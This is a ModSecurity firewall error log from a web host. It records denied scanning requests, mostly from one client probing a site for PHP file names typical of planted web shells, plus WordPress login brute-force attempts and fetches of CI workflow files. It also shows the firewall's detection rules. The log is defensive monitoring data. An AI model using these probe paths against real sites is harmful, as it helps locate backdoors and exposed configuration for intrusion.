[Tue May 26 15:05:23.468304 2026] [security2:error] [pid 678998:tid 679138] [client 20.9.81.163:57887] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/aa.php"] [unique_id "ahVpW5-Rl4i_pgT-iAdqcAAAAAo"]
[Tue May 26 15:05:23.468438 2026] [security2:error] [pid 678998:tid 679138] [client 20.9.81.163:57887] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/aa.php"] [unique_id "ahVpW5-Rl4i_pgT-iAdqcAAAAAo"]
[Tue May 26 15:05:23.500024 2026] [security2:error] [pid 678998:tid 679155] [client 136.243.220.209:48546] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVpW5-Rl4i_pgT-iAdqdAAAABs"]
[Tue May 26 15:05:23.605944 2026] [security2:error] [pid 678998:tid 679241] [client 20.9.81.163:65057] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/bolt.php"] [unique_id "ahVpW5-Rl4i_pgT-iAdqfQAAAHE"]
[Tue May 26 15:05:23.606050 2026] [security2:error] [pid 678998:tid 679241] [client 20.9.81.163:65057] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/bolt.php"] [unique_id "ahVpW5-Rl4i_pgT-iAdqfQAAAHE"]
[Tue May 26 15:05:23.757780 2026] [security2:error] [pid 678998:tid 679167] [client 20.9.81.163:48614] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/x.php"] [unique_id "ahVpW5-Rl4i_pgT-iAdqggAAACc"]
[Tue May 26 15:05:23.757913 2026] [security2:error] [pid 678998:tid 679167] [client 20.9.81.163:48614] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/x.php"] [unique_id "ahVpW5-Rl4i_pgT-iAdqggAAACc"]
[Tue May 26 15:05:23.939320 2026] [security2:error] [pid 678998:tid 679178] [client 20.9.81.163:26504] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/jga.php"] [unique_id "ahVpW5-Rl4i_pgT-iAdqhgAAADI"]
[Tue May 26 15:05:23.939405 2026] [security2:error] [pid 678998:tid 679178] [client 20.9.81.163:26504] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/jga.php"] [unique_id "ahVpW5-Rl4i_pgT-iAdqhgAAADI"]
[Tue May 26 15:05:24.124164 2026] [security2:error] [pid 678998:tid 679245] [client 20.9.81.163:26501] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/k.php"] [unique_id "ahVpXJ-Rl4i_pgT-iAdqjwAAAHU"]
[Tue May 26 15:05:24.124290 2026] [security2:error] [pid 678998:tid 679245] [client 20.9.81.163:26501] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/k.php"] [unique_id "ahVpXJ-Rl4i_pgT-iAdqjwAAAHU"]
[Tue May 26 15:05:24.293819 2026] [security2:error] [pid 678998:tid 679247] [client 20.9.81.163:65053] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/vx.php"] [unique_id "ahVpXJ-Rl4i_pgT-iAdqlQAAAHc"]
[Tue May 26 15:05:24.293961 2026] [security2:error] [pid 678998:tid 679247] [client 20.9.81.163:65053] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/vx.php"] [unique_id "ahVpXJ-Rl4i_pgT-iAdqlQAAAHc"]
[Tue May 26 15:05:24.449335 2026] [security2:error] [pid 678998:tid 679208] [client 20.9.81.163:26536] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/ws77.php"] [unique_id "ahVpXJ-Rl4i_pgT-iAdqmwAAAFA"]
[Tue May 26 15:05:24.449444 2026] [security2:error] [pid 678998:tid 679208] [client 20.9.81.163:26536] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/ws77.php"] [unique_id "ahVpXJ-Rl4i_pgT-iAdqmwAAAFA"]
[Tue May 26 15:05:24.663691 2026] [security2:error] [pid 678998:tid 679165] [client 20.9.81.163:18198] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/2.php"] [unique_id "ahVpXJ-Rl4i_pgT-iAdqqAAAACU"]
[Tue May 26 15:05:24.663782 2026] [security2:error] [pid 678998:tid 679165] [client 20.9.81.163:18198] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/2.php"] [unique_id "ahVpXJ-Rl4i_pgT-iAdqqAAAACU"]
[Tue May 26 15:05:24.834386 2026] [security2:error] [pid 678998:tid 679227] [client 192.252.215.5:44749] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.215.252.192.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahVpXJ-Rl4i_pgT-iAdqngAAAGM"], referer: https://www.cagmedya.com/
[Tue May 26 15:05:24.854207 2026] [security2:error] [pid 678998:tid 679201] [client 20.9.81.163:13628] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/abcd.php"] [unique_id "ahVpXJ-Rl4i_pgT-iAdqsAAAAEk"]
[Tue May 26 15:05:24.854352 2026] [security2:error] [pid 678998:tid 679201] [client 20.9.81.163:13628] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/abcd.php"] [unique_id "ahVpXJ-Rl4i_pgT-iAdqsAAAAEk"]
[Tue May 26 15:05:24.905001 2026] [autoindex:error] [pid 678998:tid 679194] [client 43.163.84.198:35346] AH01276: Cannot serve directory /home2/dassms2z/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:05:25.065216 2026] [security2:error] [pid 678998:tid 679253] [client 20.9.81.163:13614] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-content/plugins/admin.php"] [unique_id "ahVpXZ-Rl4i_pgT-iAdqtgAAAH0"]
[Tue May 26 15:05:25.065379 2026] [security2:error] [pid 678998:tid 679253] [client 20.9.81.163:13614] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/wp-content/plugins/admin.php"] [unique_id "ahVpXZ-Rl4i_pgT-iAdqtgAAAH0"]
[Tue May 26 15:05:25.078254 2026] [security2:error] [pid 678998:tid 679022] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/.github/workflows/ci.yaml"] [unique_id "ahVpXZ-Rl4i_pgT-iAdqtwAAJxc"]
[Tue May 26 15:05:25.195133 2026] [security2:error] [pid 678998:tid 679232] [client 20.9.81.163:55318] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/asd.php"] [unique_id "ahVpXZ-Rl4i_pgT-iAdqwgAAAGg"]
[Tue May 26 15:05:25.195255 2026] [security2:error] [pid 678998:tid 679232] [client 20.9.81.163:55318] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/asd.php"] [unique_id "ahVpXZ-Rl4i_pgT-iAdqwgAAAGg"]
[Tue May 26 15:05:25.370812 2026] [security2:error] [pid 678998:tid 679176] [client 20.9.81.163:48599] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/default.php"] [unique_id "ahVpXZ-Rl4i_pgT-iAdqwwAAADA"]
[Tue May 26 15:05:25.370911 2026] [security2:error] [pid 678998:tid 679176] [client 20.9.81.163:48599] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/default.php"] [unique_id "ahVpXZ-Rl4i_pgT-iAdqwwAAADA"]
[Tue May 26 15:05:25.516561 2026] [security2:error] [pid 678998:tid 679250] [client 20.9.81.163:31847] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/gettest.php"] [unique_id "ahVpXZ-Rl4i_pgT-iAdqzgAAAHo"]
[Tue May 26 15:05:25.516684 2026] [security2:error] [pid 678998:tid 679250] [client 20.9.81.163:31847] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/gettest.php"] [unique_id "ahVpXZ-Rl4i_pgT-iAdqzgAAAHo"]
[Tue May 26 15:05:25.579870 2026] [security2:error] [pid 678998:tid 679147] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpXZ-Rl4i_pgT-iAdqvwAAABM"]
[Tue May 26 15:05:25.683538 2026] [security2:error] [pid 678998:tid 679203] [client 20.9.81.163:27836] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/install.php"] [unique_id "ahVpXZ-Rl4i_pgT-iAdq0AAAAEs"]
[Tue May 26 15:05:25.683671 2026] [security2:error] [pid 678998:tid 679203] [client 20.9.81.163:27836] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/install.php"] [unique_id "ahVpXZ-Rl4i_pgT-iAdq0AAAAEs"]
[Tue May 26 15:05:25.833096 2026] [security2:error] [pid 678998:tid 679162] [client 20.9.81.163:31853] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/tfm.php"] [unique_id "ahVpXZ-Rl4i_pgT-iAdq1wAAACI"]
[Tue May 26 15:05:25.833178 2026] [security2:error] [pid 678998:tid 679162] [client 20.9.81.163:31853] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/tfm.php"] [unique_id "ahVpXZ-Rl4i_pgT-iAdq1wAAACI"]
[Tue May 26 15:05:25.985698 2026] [security2:error] [pid 678998:tid 679196] [client 20.9.81.163:13595] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/ws81.php"] [unique_id "ahVpXZ-Rl4i_pgT-iAdq3AAAAEQ"]
[Tue May 26 15:05:25.985804 2026] [security2:error] [pid 678998:tid 679196] [client 20.9.81.163:13595] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/ws81.php"] [unique_id "ahVpXZ-Rl4i_pgT-iAdq3AAAAEQ"]
[Tue May 26 15:05:26.141584 2026] [security2:error] [pid 678998:tid 679165] [client 20.9.81.163:31840] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/222.php"] [unique_id "ahVpXp-Rl4i_pgT-iAdq4QAAACU"]
[Tue May 26 15:05:26.141707 2026] [security2:error] [pid 678998:tid 679165] [client 20.9.81.163:31840] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/222.php"] [unique_id "ahVpXp-Rl4i_pgT-iAdq4QAAACU"]
[Tue May 26 15:05:26.294105 2026] [security2:error] [pid 678998:tid 679244] [client 20.9.81.163:57870] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/t.php"] [unique_id "ahVpXp-Rl4i_pgT-iAdq7QAAAHQ"]
[Tue May 26 15:05:26.294243 2026] [security2:error] [pid 678998:tid 679244] [client 20.9.81.163:57870] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/t.php"] [unique_id "ahVpXp-Rl4i_pgT-iAdq7QAAAHQ"]
[Tue May 26 15:05:26.437861 2026] [security2:error] [pid 678998:tid 679235] [client 20.9.81.163:59301] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-admin/maint/index.php"] [unique_id "ahVpXp-Rl4i_pgT-iAdq8wAAAGs"]
[Tue May 26 15:05:26.437999 2026] [security2:error] [pid 678998:tid 679235] [client 20.9.81.163:59301] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/wp-admin/maint/index.php"] [unique_id "ahVpXp-Rl4i_pgT-iAdq8wAAAGs"]
[Tue May 26 15:05:26.581926 2026] [security2:error] [pid 678998:tid 679202] [client 20.9.81.163:57904] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/6xBAm3vODE05BSzkJZRAws.php"] [unique_id "ahVpXp-Rl4i_pgT-iAdq9gAAAEo"]
[Tue May 26 15:05:26.582037 2026] [security2:error] [pid 678998:tid 679202] [client 20.9.81.163:57904] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/6xBAm3vODE05BSzkJZRAws.php"] [unique_id "ahVpXp-Rl4i_pgT-iAdq9gAAAEo"]
[Tue May 26 15:05:26.764480 2026] [security2:error] [pid 678998:tid 679192] [client 20.9.81.163:55323] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/a.php"] [unique_id "ahVpXp-Rl4i_pgT-iAdq_wAAAEA"]
[Tue May 26 15:05:26.764640 2026] [security2:error] [pid 678998:tid 679192] [client 20.9.81.163:55323] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/a.php"] [unique_id "ahVpXp-Rl4i_pgT-iAdq_wAAAEA"]
[Tue May 26 15:05:26.898974 2026] [security2:error] [pid 678998:tid 679247] [client 20.9.81.163:55339] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/a1.php"] [unique_id "ahVpXp-Rl4i_pgT-iAdrBgAAAHc"]
[Tue May 26 15:05:26.899091 2026] [security2:error] [pid 678998:tid 679247] [client 20.9.81.163:55339] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/a1.php"] [unique_id "ahVpXp-Rl4i_pgT-iAdrBgAAAHc"]
[Tue May 26 15:05:27.064137 2026] [security2:error] [pid 678998:tid 679145] [client 20.9.81.163:55319] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/onclickfuns.php"] [unique_id "ahVpX5-Rl4i_pgT-iAdrCgAAABE"]
[Tue May 26 15:05:27.064251 2026] [security2:error] [pid 678998:tid 679145] [client 20.9.81.163:55319] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/onclickfuns.php"] [unique_id "ahVpX5-Rl4i_pgT-iAdrCgAAABE"]
[Tue May 26 15:05:27.164150 2026] [security2:error] [pid 678998:tid 679038] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/.github/workflows/ci.yml"] [unique_id "ahVpX5-Rl4i_pgT-iAdrCwAAXyc"]
[Tue May 26 15:05:27.202042 2026] [security2:error] [pid 678998:tid 679211] [client 20.9.81.163:27830] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/w.php"] [unique_id "ahVpX5-Rl4i_pgT-iAdrDAAAAFM"]
[Tue May 26 15:05:27.202192 2026] [security2:error] [pid 678998:tid 679211] [client 20.9.81.163:27830] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/w.php"] [unique_id "ahVpX5-Rl4i_pgT-iAdrDAAAAFM"]
[Tue May 26 15:05:27.332163 2026] [security2:error] [pid 678998:tid 679140] [client 20.9.81.163:48601] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-admin/maint/about.php"] [unique_id "ahVpX5-Rl4i_pgT-iAdrGQAAAAw"]
[Tue May 26 15:05:27.332300 2026] [security2:error] [pid 678998:tid 679140] [client 20.9.81.163:48601] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/wp-admin/maint/about.php"] [unique_id "ahVpX5-Rl4i_pgT-iAdrGQAAAAw"]
[Tue May 26 15:05:27.525037 2026] [security2:error] [pid 678998:tid 679149] [client 20.9.81.163:25264] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-content/plugins/index.php"] [unique_id "ahVpX5-Rl4i_pgT-iAdrIQAAABU"]
[Tue May 26 15:05:27.525139 2026] [security2:error] [pid 678998:tid 679149] [client 20.9.81.163:25264] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/wp-content/plugins/index.php"] [unique_id "ahVpX5-Rl4i_pgT-iAdrIQAAABU"]
[Tue May 26 15:05:27.660584 2026] [security2:error] [pid 678998:tid 679177] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpX5-Rl4i_pgT-iAdrEQAAADE"]
[Tue May 26 15:05:27.674285 2026] [security2:error] [pid 678998:tid 679228] [client 20.9.81.163:17234] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-good.php"] [unique_id "ahVpX5-Rl4i_pgT-iAdrJQAAAGQ"]
[Tue May 26 15:05:27.674418 2026] [security2:error] [pid 678998:tid 679228] [client 20.9.81.163:17234] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/wp-good.php"] [unique_id "ahVpX5-Rl4i_pgT-iAdrJQAAAGQ"]
[Tue May 26 15:05:27.785798 2026] [security2:error] [pid 678998:tid 679169] [client 136.243.220.209:31941] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVpX5-Rl4i_pgT-iAdrKAAAACk"]
[Tue May 26 15:05:27.803389 2026] [security2:error] [pid 678998:tid 679202] [client 20.9.81.163:48634] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/\\\\.[a-z0-9]{4}\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "784"] [id "900080"] [msg "PHP Mailer Access Attempt"] [hostname "jhonparra.com"] [uri "/.info.php"] [unique_id "ahVpX5-Rl4i_pgT-iAdrKwAAAEo"]
[Tue May 26 15:05:27.803491 2026] [security2:error] [pid 678998:tid 679202] [client 20.9.81.163:48634] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "406"] [hostname "jhonparra.com"] [uri "/.info.php"] [unique_id "ahVpX5-Rl4i_pgT-iAdrKwAAAEo"]
